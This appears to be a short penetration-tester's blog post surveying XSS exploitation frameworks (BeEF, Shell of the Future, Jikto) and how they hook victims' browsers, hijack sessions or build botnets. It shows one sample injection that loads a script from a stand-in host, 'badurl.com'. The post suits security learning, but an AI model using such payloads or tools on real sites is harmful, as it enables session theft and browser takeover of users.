Cross-Site Scripting (as I had just recently discussed in a previous post) is a fairly simple attack to find and prove. However, actually making it do something useful is often elusive. The common vector is usually something like stealing cookies; session ids, etc.
In a penetration test, you would find it difficult to display criticality of a threat using a simple alert() box containing some text. Fortunately, there are a few tools out there that can help us demonstrate the danger of XSS. Most of these tools will cause exploitation via an injection similar to this:
<img src=”badurl.com/eviljs.js” />
- Browser Exploitation Framework (BEeF) – This amazing tool is my favorite stop for exploiting XSS beyond alert boxes. Essentially, when the victims browser executes the js file, it hooks into a php page that then allows a variety of attacks to be made. The attacker will see the attacked machine appear as a “zombie” and can do as they wish. The basics are included, as well as some metasploit interaction (i.e, Java Applet attack). From here it is simple to push a shell through, and achieve persistent exploitation of the target.
- Shell of the Future – This is another great tool for session hijacking via XSS. It works by using the HTML5 Cross Origin Request capability. When a user executes the payload, it then creates a connection to SotF’s web server (hosted on your machine). On the attacker end, SotF sets up a proxy that connects in with the server. So essentially, the attackers connection to your web server acts as a proxy for your browser. The attacker then browses to the SotF console, selects the victim, and can then browse using the victims session.
- Jikto – This tools received a lot of media attention when it was released. It was considered questionable about how any legitimate use of this tool was feasible . It works like this: When the victim executes the JS, it hooks them into botnet. From there the client can search, port scan, and exploits discovered XSS victims. The last I looked most of the source code was hidden away (or the mirrors were taken down).
- Others – there are others out there XSS Shell, etc. I wont go into details on those because they have simliar capabilities of those I listen above. If you have some of your favorites, please post a comment for others to look into.
I hope this was a little helpful.